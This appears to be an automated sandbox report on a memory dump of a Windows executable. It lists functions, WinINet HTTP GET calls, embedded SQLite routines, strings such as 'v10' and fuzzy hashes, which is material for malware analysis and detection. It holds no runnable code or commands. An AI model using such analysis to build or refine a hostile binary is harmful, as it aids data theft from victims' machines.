Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: Child page depth differs$Corruption detected in cell %d on page %d$Fragmentation of %d bytes reported as %d on page %d$Multiple uses for byte %d of page %d$On page %d at right child: $On tree page %d cell %d: $Page %d: $Rowid %lld out of order (max larger than parent max of %lld)$Rowid %lld out of order (max larger than parent min of %lld)$Rowid %lld out of order (min less than parent max of %lld)$Rowid %lld out of order (min less than parent min of %lld)$Rowid %lld out of order (previous was %lld)$btreeInitPage() returns error code %d$unable to get the page. error code=%d
API String ID: 0-2326541033
Opcode ID: 595790d936ca82a89320054d5f74cdfb5b2d646166774f9c90e660a9b08fb264
Instruction ID: faa56be6321582b24f794048a7152db149625d79fc18a7529399796fe82704c1
Opcode Fuzzy Hash: 595790d936ca82a89320054d5f74cdfb5b2d646166774f9c90e660a9b08fb264
Instruction Fuzzy Hash: D7126B71900129AFEF14DFA9C881BAEBBB1FF44314F14816AF855AB241D7789E50CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E083, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 143networkCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040E08A
__cftof.LIBCMT ref: 0040E113
InternetOpenA.WININET(?,00000000,?,00000000,00000000), ref: 0040E12E
InternetSetOptionA.WININET(00000000,00000041,00000004), ref: 0040E151
InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 0040E172
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00400000,00000001), ref: 0040E19C
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E1B5
InternetCloseHandle.WININET(00000000), ref: 0040E1CB

Part of subcall function 00402EA9: std::_Xinvalid_argument.LIBCPMT ref: 00402EBC
Part of subcall function 00402EA9: _memmove.LIBCMT ref: 00402EF7

InternetCloseHandle.WININET(?), ref: 0040E1D4
InternetCloseHandle.WININET(?), ref: 0040E1DD

Strings

/, xrefs: 0040E0D7
GET, xrefs: 0040E196
http://, xrefs: 0040E0AD

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSendXinvalid_argument__cftof_memmovestd::_
String ID: /$GET$http://
API String ID: 2363951992-2325301807
Opcode ID: cece20078e738623206af8c20ab103f171099a69b905ad46f83a6c7eb2a98108
Instruction ID: 2c2113c5417e3d0e7c384b688603722c4f18f4d71f7c428fa70701178f72a7ca
Opcode Fuzzy Hash: cece20078e738623206af8c20ab103f171099a69b905ad46f83a6c7eb2a98108
Instruction Fuzzy Hash: 184119B1900208AEEB11EBE6CC85EEEBB7CEB14704F10443EF512B61D1DBB959458B69

Uniqueness

Uniqueness Score: -1.00%

Function 004042FC, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 277COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040434D
_memmove.LIBCMT ref: 0040439B
_memmove.LIBCMT ref: 004043C5
_memmove.LIBCMT ref: 004043FB
_memmove.LIBCMT ref: 00404457
_memmove.LIBCMT ref: 004044B1
_memmove.LIBCMT ref: 004044FE
_memmove.LIBCMT ref: 0040452C
_memmove.LIBCMT ref: 0040455F
std::_Xinvalid_argument.LIBCPMT ref: 0040458B

Strings

invalid string position, xrefs: 00404586
string too long, xrefs: 00404348

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: e1dcb338f6ff882e4ebbf147682959a3a90d1cafc345398e3fd207376342e08e
Instruction ID: 4bd97c7bb5cd782722ec7cea22b93ec19d06687b45f0035df8191a130f6a9bc8
Opcode Fuzzy Hash: e1dcb338f6ff882e4ebbf147682959a3a90d1cafc345398e3fd207376342e08e
Instruction Fuzzy Hash: 0C913EB03001059BCF24DF18DD91A6EB7A6EFC1708724493EFA42AB681D778E855CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0042E9DC, Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 269COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0042EAC4
__fprintf_l.LIBCMT ref: 0042EBF5
_memmove.LIBCMT ref: 0042EC9F

Strings

sqlite3_, xrefs: 0042EB33
error during initialization: %s, xrefs: 0042EC48
_init, xrefs: 0042EBAB
sqlite3_extension_init, xrefs: 0042EA3B
%s.%s, xrefs: 0042EA65
no entry point [%s] in shared library [%s], xrefs: 0042EBEE
unable to open shared library [%s], xrefs: 0042EABD
not authorized, xrefs: 0042EA19
lib, xrefs: 0042EB58

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l$_memmove
String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%s]
API String ID: 3461008893-4148685299
Opcode ID: 40c66fe5060782ab32122c4b1b2bab727f803f1be732ea730856a7be84874fa7
Instruction ID: 686d5b9f190d863a25cbb6758587c95e1d8d3715b8070b6b7ef7b9f75d0d896d
Opcode Fuzzy Hash: 40c66fe5060782ab32122c4b1b2bab727f803f1be732ea730856a7be84874fa7
Instruction Fuzzy Hash: DA91B371A00325AFDF21EFA6E841AAE7BB4FF44304F54446AF845AB241D7389940CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004406FD, Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 360COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00440A8E

Strings

access, xrefs: 004409D7
vfs, xrefs: 00440964
no such %s mode: %s, xrefs: 00440A16
mode, xrefs: 004409B7
no such vfs: %s, xrefs: 00440AB7
invalid uri authority: %.*s, xrefs: 004407CF
%s mode not allowed: %s, xrefs: 00440A5C
cache, xrefs: 0044098A
localhost, xrefs: 004407BC
file:, xrefs: 0044073E

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove
String ID: %s mode not allowed: %s$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
API String ID: 4104443479-2023962546
Opcode ID: 0991d6dc8eb649fb25ea203fac6ef4c599ccc545146c4cdf17e6c1cbd09b9ec9
Instruction ID: 6fbf85c83f6a683e4e5f8bbbedeacf4bcf715c84a3be88edf7155a454e20b68a
Opcode Fuzzy Hash: 0991d6dc8eb649fb25ea203fac6ef4c599ccc545146c4cdf17e6c1cbd09b9ec9
Instruction Fuzzy Hash: 19C10971D042199BFF24DF68C4807EEBBB1AF55314F24406BE944AB342D7389D928B99

Uniqueness

Uniqueness Score: -1.00%

Function 00404027, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404069
_memmove.LIBCMT ref: 004040B4
_memmove.LIBCMT ref: 004040EE
_memmove.LIBCMT ref: 00404111
std::_Xinvalid_argument.LIBCPMT ref: 0040413D
std::_Xinvalid_argument.LIBCPMT ref: 00404188
std::_Xinvalid_argument.LIBCPMT ref: 0040419E
_memmove.LIBCMT ref: 004041E1
_memmove.LIBCMT ref: 004041FE

Strings

invalid string position, xrefs: 00404138, 00404183
string too long, xrefs: 00404064, 00404199

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: c26d2d35058b0d4886ab527f8dc05504dec7deb65eeb02a14e7f29b0bef27195
Instruction ID: 029a1ed6df909386a0fd4be93ffa626285e4c0521d2b432efc450b21c908ee87
Opcode Fuzzy Hash: c26d2d35058b0d4886ab527f8dc05504dec7deb65eeb02a14e7f29b0bef27195
Instruction Fuzzy Hash: 9A51E0B03002449BDB249E5DDD8492BB7A6EBD1704B14092FFA52AB6C1CB78EC81C79D

Uniqueness

Uniqueness Score: -1.00%

Function 0042A9F9, Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0041E194: _memset.LIBCMT ref: 0041E1B1

__fprintf_l.LIBCMT ref: 0042AA90
__fprintf_l.LIBCMT ref: 0042AB0C
__fprintf_l.LIBCMT ref: 0042AB85
__fprintf_l.LIBCMT ref: 0042AC15

Strings

winGetTempname1, xrefs: 0042AA71
winGetTempname2, xrefs: 0042AB59
winGetTempname3, xrefs: 0042AAED
etilqs_, xrefs: 0042AA02, 0042AC06
winGetTempname5, xrefs: 0042ABE5
winGetTempname4, xrefs: 0042ABFC

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l$_memset
String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5
API String ID: 639243752-3409217566
Opcode ID: 3ddff6608b8166ea6f4b1a83f9d9418697d365b64e81103a959845a5ff67348d
Instruction ID: c05b965fa417139a0660b0f0fc0e17a3cf22c761794f4fc20f088162223cf099
Opcode Fuzzy Hash: 3ddff6608b8166ea6f4b1a83f9d9418697d365b64e81103a959845a5ff67348d
Instruction Fuzzy Hash: 1B614630704611EBD714BF26ED41DBE3B9A9F41348B54442FF80286286EB3CD992C6AF

Uniqueness

Uniqueness Score: -1.00%

Function 0046092E, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00460935
std::_Lockit::_Lockit.LIBCPMT ref: 0046093F
int.LIBCPMT ref: 00460956

Part of subcall function 0040E7C0: std::_Lockit::_Lockit.LIBCPMT ref: 0040E7D1

std::locale::_Getfacet.LIBCPMT ref: 0046095F
codecvt.LIBCPMT ref: 00460979
std::bad_exception::bad_exception.LIBCMT ref: 0046098D
__CxxThrowException@8.LIBCMT ref: 0046099B
std::locale::facet::_Incref.LIBCPMT ref: 004609AB
std::locale::facet::_Facet_Register.LIBCPMT ref: 004609B1

Strings

bad cast, xrefs: 00460985

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 1335069804-3145022300
Opcode ID: cd79384fef1f77b9072095cc43c5610e65244484bd1c5ee125791dbdcc01bb60
Instruction ID: 55cdbc2eda2367954acc80750543d153a50a7ecde925d63bde76dc9d08433b43
Opcode Fuzzy Hash: cd79384fef1f77b9072095cc43c5610e65244484bd1c5ee125791dbdcc01bb60
Instruction Fuzzy Hash: 0D015E7190021597CF01FBA2C852ABE7326AF50728F15092FE4116B2D2EF3C9A05975E

Uniqueness

Uniqueness Score: -1.00%

Function 004109F9, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00410A00
std::_Lockit::_Lockit.LIBCPMT ref: 00410A0A
int.LIBCPMT ref: 00410A21

Part of subcall function 0040E7C0: std::_Lockit::_Lockit.LIBCPMT ref: 0040E7D1

std::locale::_Getfacet.LIBCPMT ref: 00410A2A
ctype.LIBCPMT ref: 00410A44
std::bad_exception::bad_exception.LIBCMT ref: 00410A58
__CxxThrowException@8.LIBCMT ref: 00410A66
std::locale::facet::_Incref.LIBCPMT ref: 00410A76
std::locale::facet::_Facet_Register.LIBCPMT ref: 00410A7C

Strings

bad cast, xrefs: 00410A50

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 2043575007-3145022300
Opcode ID: 44a746111c136fa462104c10abe98b07bafbb958524ccdf8178c93e08636b6f1
Instruction ID: 5e07171dfcbb5b2c7f366fbbc61a156674da89e8b8465a570a758c9dc626d0df
Opcode Fuzzy Hash: 44a746111c136fa462104c10abe98b07bafbb958524ccdf8178c93e08636b6f1
Instruction Fuzzy Hash: 120161319002159BCF01FBA2D852AFD73356F50728F15492FE4116B2D1EF7C9A81975E

Uniqueness

Uniqueness Score: -1.00%

Function 00460A94, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00460A9B
std::_Lockit::_Lockit.LIBCPMT ref: 00460AA5
int.LIBCPMT ref: 00460ABC

Part of subcall function 0040E7C0: std::_Lockit::_Lockit.LIBCPMT ref: 0040E7D1

std::locale::_Getfacet.LIBCPMT ref: 00460AC5
numpunct.LIBCPMT ref: 00460ADF
std::bad_exception::bad_exception.LIBCMT ref: 00460AF3
__CxxThrowException@8.LIBCMT ref: 00460B01
std::locale::facet::_Incref.LIBCPMT ref: 00460B11
std::locale::facet::_Facet_Register.LIBCPMT ref: 00460B17

Strings

bad cast, xrefs: 00460AEB

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrownumpunctstd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 2348202366-3145022300
Opcode ID: 4f0d858934899a9dd91069a97cb49ff683f417477bd3762ad21fc64a80e8f397
Instruction ID: 577e885cad7f9192c5acc5f6b94075d75a9c2ca027216a2a9fdfc77923ff9818
Opcode Fuzzy Hash: 4f0d858934899a9dd91069a97cb49ff683f417477bd3762ad21fc64a80e8f397
Instruction Fuzzy Hash: 9101617190021997CF01FBA2D852ABE7335AF40B28F50096FE4117B2D1EF7C9A01975E

Uniqueness

Uniqueness Score: -1.00%

Function 0042262F, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 139COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 004226EE
__fprintf_l.LIBCMT ref: 00422733
_memmove.LIBCMT ref: 00422776
__fprintf_l.LIBCMT ref: 004227A3

Strings

CREATE TABLE , xrefs: 004226E5
, , xrefs: 004226AD
, xrefs: 004226A6

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l$_memmove
String ID: $, $CREATE TABLE
API String ID: 3461008893-3459038510
Opcode ID: d6421dbf6bc4441316b2a147696ad7a70d4d02c7e0e72bfb320e455724b1bc93
Instruction ID: 7afaa2fc4a9fa72412e12cf93fe45c373d5c9d54822805eca9fabad4e085ff01
Opcode Fuzzy Hash: d6421dbf6bc4441316b2a147696ad7a70d4d02c7e0e72bfb320e455724b1bc93
Instruction Fuzzy Hash: 31518072D00229EFCB10DF99D981AEFBBF5EF44308F60445BE845A7205E7789A45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC70, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0041ED17
__fprintf_l.LIBCMT ref: 0041ED2C

Strings

OsError 0x%lx (%lu), xrefs: 0041ED0C
FdF, xrefs: 0041ECA1
bF, xrefs: 0041ECFE
@dF, xrefs: 0041ECD9

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l
String ID: @dF$FdF$OsError 0x%lx (%lu)$bF
API String ID: 3906573944-153937404
Opcode ID: 9332f5d02ffc12a5038ac2e4e5ef1477120ae145df3202d43c9f169b28bf42c2
Instruction ID: 0390b4f7275df070a5972724ba80d02ce4912bcb43aaac47ae6431803e5d4c0a
Opcode Fuzzy Hash: 9332f5d02ffc12a5038ac2e4e5ef1477120ae145df3202d43c9f169b28bf42c2
Instruction Fuzzy Hash: C821A179900118FACF11BBA7ED49CDF7F7AEF84794B104067F905A2110DB384A80DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00470180, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00499468,00000008,00470288,00000000,00000000,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 00470191
__lock.LIBCMT ref: 004701C5

Part of subcall function 00472A09: __mtinitlocknum.LIBCMT ref: 00472A1F
Part of subcall function 00472A09: __amsg_exit.LIBCMT ref: 00472A2B
Part of subcall function 00472A09: EnterCriticalSection.KERNEL32(00000000,00000000,?,004701CA,0000000D), ref: 00472A33

InterlockedIncrement.KERNEL32(?), ref: 004701D2
__lock.LIBCMT ref: 004701E6
___addlocaleref.LIBCMT ref: 00470204

Strings

KERNEL32.DLL, xrefs: 0047018C

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: bd2d73a5c37b10c049c8130ad4cf988b84cbb8acb719e10c445666a9b0dac508
Instruction ID: 8e00da309b3ace2d843035e86f14a78c79139ab64b9b24529f34df930dded43d
Opcode Fuzzy Hash: bd2d73a5c37b10c049c8130ad4cf988b84cbb8acb719e10c445666a9b0dac508
Instruction Fuzzy Hash: B601A171441B00EFD720AFA6D909749FBE0AF00319F20895FE499523A1DBB8AA44CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0046AE25, Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 0046AE2B

Part of subcall function 004700F2: TlsGetValue.KERNEL32(00000001,0047024B,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 004700FB
Part of subcall function 004700F2: DecodePointer.KERNEL32(?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 0047010D
Part of subcall function 004700F2: TlsSetValue.KERNEL32(00000000,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 0047011C

___fls_getvalue@4.LIBCMT ref: 0046AE36

Part of subcall function 004700D2: TlsGetValue.KERNEL32(?,?,0046AE3B,00000000), ref: 004700E0

___fls_setvalue@8.LIBCMT ref: 0046AE49

Part of subcall function 00470126: DecodePointer.KERNEL32(?,?,?,0046AE4E,00000000,?,00000000), ref: 00470137

GetLastError.KERNEL32(00000000,?,00000000), ref: 0046AE52
ExitThread.KERNEL32 ref: 0046AE59
GetCurrentThreadId.KERNEL32 ref: 0046AE5F
__freefls@4.LIBCMT ref: 0046AE7F

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 2383549826-0
Opcode ID: 99437fb885bb50426bd6178ae67086b9c5fb5be92b5721f1a8155e23dc5250b6
Instruction ID: 9ce08f433f22b6bcf284ccd45ebaaef25cd052e2d7398b0ecc966dfe28aeee09
Opcode Fuzzy Hash: 99437fb885bb50426bd6178ae67086b9c5fb5be92b5721f1a8155e23dc5250b6
Instruction Fuzzy Hash: EEF06274101640EBC704BF72D94988F7BA9AF44718310C45EB40997223EB3ED842CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0044890C, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 405COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00448AD0

Strings

MJ delete: %s, xrefs: 00448AF2
MJ collide: %s, xrefs: 00448A9B
-mj%06X9%02X, xrefs: 00448AC6
%s-mjXXXXXX9XXz, xrefs: 00448A66

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l
String ID: %s-mjXXXXXX9XXz$-mj%06X9%02X$MJ collide: %s$MJ delete: %s
API String ID: 3906573944-4034981963
Opcode ID: 81019ecf9657fd194a133af4bca22953febb2cfe1cc7bdad44359f2ba744c3e6
Instruction ID: d62ea1f71efc347e81bb8cdf44990b6c7e3c185f246806260c88599b9431391f
Opcode Fuzzy Hash: 81019ecf9657fd194a133af4bca22953febb2cfe1cc7bdad44359f2ba744c3e6
Instruction Fuzzy Hash: D8E13B70E01619EFEB21DF99C881AAEB7B1FF04714F14445FE905A7341CB789E818B99

Uniqueness

Uniqueness Score: -1.00%

Function 0042CB52, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 232COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0042CC58
_memmove.LIBCMT ref: 0042CD76

Strings

foreign key on %s should reference only one column of table %T, xrefs: 0042CBAF
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 0042CBD7
unknown column "%s" in foreign key definition, xrefs: 0042CD46

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 4104443479-272990098
Opcode ID: 15dc38a84e5e7516d60639c0f1892b181a839f08382dc31906713e833e334bb8
Instruction ID: 4ebbcf98fc211a4dc3bf637eb21ea4428b9fd7c8e5b79575881eb30b1c182e0f
Opcode Fuzzy Hash: 15dc38a84e5e7516d60639c0f1892b181a839f08382dc31906713e833e334bb8
Instruction Fuzzy Hash: 02918071A00215DFCB10DF59D980AAEBBF1FF48314B54856EE805AB312D739EA41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB66, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040CBA6
_memmove.LIBCMT ref: 0040CC69
std::_Xinvalid_argument.LIBCPMT ref: 0040CC89

Strings

invalid string position, xrefs: 0040CC84
string too long, xrefs: 0040CBA1

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 3b0826ae85ae7f24161e865d78adb7e7430a6d7846291ed2e32f3631054e1c30
Instruction ID: c20ba6021509885642bc9c17e758f4193033208c6ef95c946a024ca4b614648a
Opcode Fuzzy Hash: 3b0826ae85ae7f24161e865d78adb7e7430a6d7846291ed2e32f3631054e1c30
Instruction Fuzzy Hash: EC41B270304205DBDB14DF58D9C086A73B6EB867047204A3FE806EB2C1E638ED06CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412474, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0041247B
_memset.LIBCMT ref: 004124D6
LocalAlloc.KERNEL32 ref: 00412511

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Strings

NULL, xrefs: 00412588
v10, xrefs: 004124A4

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$AllocH_prolog3_Local_memset
String ID: NULL$v10
API String ID: 1135815740-1391045996
Opcode ID: 4f12ef1e7e9e5dec935c9b6a6143f6fd8c3739b0802609ccb78e578dd42ec465
Instruction ID: cc3130879b4121855b668327c8becf4fce46d84024f1dbedde584216a45d2d9e
Opcode Fuzzy Hash: 4f12ef1e7e9e5dec935c9b6a6143f6fd8c3739b0802609ccb78e578dd42ec465
Instruction Fuzzy Hash: 7D416F71900218ABDF14DFA5DD95BEEBBB9FF84304F10442EF401AB282D7B99950CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042C374, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 0041E194: _memset.LIBCMT ref: 0041E1B1

__fprintf_l.LIBCMT ref: 0042C3BC
__aulldiv.LIBCMT ref: 0042C3F6
__fprintf_l.LIBCMT ref: 0042C405

Strings

%llu, xrefs: 0042C3FD
%llu, xrefs: 0042C3B4

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l$__aulldiv_memset
String ID: %llu$%llu
API String ID: 2327972778-4283164361
Opcode ID: 346758ee5d5abfb5b7ff487ebdb8ead41457536dcf3fb43467ff9954f17c104c
Instruction ID: a10534b6bbca0ac527d016d8594591406dd601fb04a4144a787af7a0f2057c78
Opcode Fuzzy Hash: 346758ee5d5abfb5b7ff487ebdb8ead41457536dcf3fb43467ff9954f17c104c
Instruction Fuzzy Hash: 9F21A671B00304BBDB14AF95DCC2EAF37AADB80364F50852EF851972C1DA78AD818669

Uniqueness

Uniqueness Score: -1.00%

Function 0046088E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004608A5

Part of subcall function 004664DF: std::exception::exception.LIBCMT ref: 004664F4
Part of subcall function 004664DF: __CxxThrowException@8.LIBCMT ref: 00466509
Part of subcall function 004664DF: std::exception::exception.LIBCMT ref: 0046651A

std::_Xinvalid_argument.LIBCPMT ref: 004608BB
_memmove.LIBCMT ref: 004608FC

Strings

invalid string position, xrefs: 004608A0
string too long, xrefs: 004608B6

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: 8f0609573dc8792e3b787da4b70a5af370bb0670c6a8f31ef5ae934659b5e719
Instruction ID: 07e3c47380ad6b6ed52e3ac9c5d70053e8c35ad7b09bccb0c1d6982e88b20f38
Opcode Fuzzy Hash: 8f0609573dc8792e3b787da4b70a5af370bb0670c6a8f31ef5ae934659b5e719
Instruction Fuzzy Hash: 8411C4717006005BDB24FE5DDC81A2FB7AAEF81754B14092FF49297682EB78AC44C79E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA3C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040CA53

Part of subcall function 004664DF: std::exception::exception.LIBCMT ref: 004664F4
Part of subcall function 004664DF: __CxxThrowException@8.LIBCMT ref: 00466509
Part of subcall function 004664DF: std::exception::exception.LIBCMT ref: 0046651A

std::_Xinvalid_argument.LIBCPMT ref: 0040CA75
_memmove.LIBCMT ref: 0040CAB9

Strings

invalid string position, xrefs: 0040CA4E
string too long, xrefs: 0040CA70

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: d19cbd53ed256edd4ac688289e7d27b510d1771306d2483830b2ee19bf9824ed
Instruction ID: 7b292972aec31b16c06abc19042f9319a01fcdf3a23de0930ca09397c59b4ff7
Opcode Fuzzy Hash: d19cbd53ed256edd4ac688289e7d27b510d1771306d2483830b2ee19bf9824ed
Instruction Fuzzy Hash: 0C11B631300608DBCB14DF68D8C1E5AB3A9BF85714721462FF816A72C1EB38E905CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041005B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0041007A
std::exception::exception.LIBCMT ref: 0041009C

Strings

ios_base::badbit set, xrefs: 0041008E
ios_base::failbit set, xrefs: 004100C4
ios_base::eofbit set, xrefs: 004100D4

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3728558374-1866435925
Opcode ID: 9561d2db12ff41735d027b913010fef2fd9cd2c7c1fadabdfb83a954d76bc28e
Instruction ID: 60622e9e0da85198d585e2f089a221f2e5f0a0c7649fd425f0b24498514ed944
Opcode Fuzzy Hash: 9561d2db12ff41735d027b913010fef2fd9cd2c7c1fadabdfb83a954d76bc28e
Instruction Fuzzy Hash: C30175B1400608AEC740FF69C405BEE7FF49B04358F94C41FA5459B211EBBCCA858B6A

Uniqueness
